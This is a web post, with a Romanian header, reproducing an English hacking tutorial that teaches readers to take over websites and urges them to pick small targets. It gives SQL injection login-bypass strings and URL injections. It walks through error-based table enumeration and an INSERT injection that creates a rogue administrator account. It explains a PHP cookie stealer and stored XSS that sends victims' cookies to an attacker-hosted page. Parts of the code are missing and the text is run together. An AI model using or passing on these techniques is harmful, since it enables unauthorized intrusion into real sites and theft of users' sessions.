1602

Hacking adevarat in engleza si romana. Rog rusii sa nu intre.....

documente despre hacking....By ParazituBy ParazituThe goal of this project is to teach others the skills needed to take control of a webpage.We will go over the methods fairly quickly, but rest assured, we will provide links forfurther knowledge as that is what we are encouraging. The skills learned should beapplied in an ethical manner - we don’t want anyone getting arrested as a result of thispaper. We also hope everyone is able to use common sense and go after small sites,which don’t handle credit card numbers etc. If you break into one of these sites withpaypal info you will be fucked.Please enjoy this paper and use caution when attack a website.Good luck and have fun.Knowing Your Enemy[0b]Although this tutorial is focused mainly on web based attacks it is very important toenumerate your target. Using certain tools (the non-skiddie kind) we are able to find outwhat ports are open, the OS of the server and other important data. The first thing weshould do is scan the target for open ports using a port scanner. I use Super Scanner 4.0by Foundstone because it has a nice GUI, but others will argue NMAP is a much betterscanner.Once the ports are scanned and we have jotted down, in a text file, which ports they areand what services run on them, we can run a directory mapping program. The favoredprogram is something called Intellitamper which maps out directories - sometimesdisclosing hidden directories that you weren’t meant to find!To gather more information, such as the registrar of the domain we can use onlineresources such as whois.networksolutions.com and dnsstuff.com, which bothgive us valuable information on the target.SQL Injection Login Bypass[1a]Welcome to the wonderful world of SQL Injections. This first method is the easiest.This section will be short and straight forward. What we will be doing is injecting intothe login username and password section in order to fool the server into giving us access.When attempting to attack a site this should probably be the first method you try.Our injection will look something like this:‘OR 1=1--Yes, it’s that simple. We will put this in the username and password fields. By doingthis we are tricking the SQL query into giving us privileges on the website.There is another method where you are able to inject into the URL. This technique isessentially the same. Example:www.target.com/index.php?id=0The is what the target website’s page looks like. We are going to inject into the id= partof the URL. Hopefully this will give us a positive login and we will have privileges. Ourinjection might look something like this:www.target.com/index.php?id=0 ‘OR 1=1--This method is sometimes referred to ’Blind SQL Injection’ as we don’t exactly knowwhat this will do (hence ’blind’).Both methods have the same outcome. There are several injections that are commonlyused such as:admin'--' or 0=0 --" or 0=0 --or 0=0 --‘hi or 1=1--The injections work basically the same other than some will get past different filtersettings, depending on what the admin of the site has them set to.Points for Further Knowledge:http://www.sqlsecurity.com/ - General SQL Security/Injection informationhttp://w3schools.com/sql/default.asp - Learning the SQL languageSQL Injection - Table Modification[1b]This method is one of the more advanced SQL Injection methods. There are three steps.First, we have to generate an error so that we can see the table names (so that we cancreate a privileged account). Next we have generate a slightly different error to gainanother important table name. Finally, we will inject SQL in order to create a newadministrator account.To accomplish our first goal we will inject something like the following:Username: ‘Having1=1--Enter this and leave the password field blanks. Once this is injected we will, hopefully,receive an error message that will reveal a table name. We are hoping to get an errorsuch as this:Column user_member.user_id is invalid and was not found etc.The error will be longer than that but all we really need is the table name.‘user_member.id’. Next, we will inject some SQL so that we can produce yet anothererror. Like so:‘UNION SELECT * FROM user_member WHERE USER_ID=‘admin’ GROUP BYUSER_ID HAVING 1=1;--Now we have generated another error. The error may look something like the following.Column user_member.user_id is invalid and was not found … Columnuser_member.passwd is invalid and was not found etc.The above example shows us that there user_member.passwd holds the passwords. Wewill now attempt to create another user, thus gaining us privileges. Use the bellow codein the Username field to insert the user:‘INSERT INTO user_member (USER_NAME, LOGIN_ID, PASSWORD,CREATION_DATE) VALUES(‘Ethernet’,’hacked’,’hacked’,GETDATE();--Success! We can now login with the username ‘Ethernet’ and the password ‘hacked’.Please note that the errors have been shortened down and everything simplified for thepurpose of this paper. This concludes the SQL Injection module of this paper.Points for Further Knowledge:http://w3schools.com/sql/default.asp - Learning the SQL language(It is highly recommended that you read the information provided in the above link, it isessential for expanding your SQL Injection skills)SS - Cookie Stealer[2a]First off, XSS (or CSS) stands for Cross Site Scripting. What we will learn today,specifically, is how to inject code into a guest book or insecure forum so that the userscookies will be logged.Cookies are used on allot of websites to verify authentication. The cookies are unique foreach user. So, if we take the cookies we are technically able to become that user.Now, let’s get down to it with some cookie stealer code. We’ll need to have a subdomain to host this on so you can get one at dajoob (www.dajoob.com), which I prefer.So, once we have this we can use the following PHP code for our cookie stealer:Name this file ‘stealer.php’. This is the basis of our cookie stealer. Let’s quickly runthrough this line-by-line.$cookie = $_GET['cookie'];This sets the variable $cookie to whatever is inputted as $_GET[‘cookie’]. This isimportant because this is what stores the users cookie value.$log = fopen("cookies11.txt","a");This sets the variable $log to op the text file’cookies11’ and set the permissions it needsto write to it with the “a” part of it.fwrite($log, $cookie ."\n");Writes the user cookie to the log file.fclose($log);Closes the log file.Now that we understand how the code works we can move on to the xss injection part ofthis section. You must realize that there must be, what’s known as, a permanent xss holein the web application. A permanent xss usually pertains to something like a guestbookor forum. To test whether we are able to inject xss into the forum insert the followingtest script:If there is a hole the text “Testing For XSS Hole” will show up in an alert box. Now,then, if all is well and we have a permanent xss hole we can enter the following redirectcode:This code redirects the user to http://yoursite.com/stealer.php and then adds the userscookie to the end. If we now check our file there should be a user cookie inside‘cookies11.txt’.
0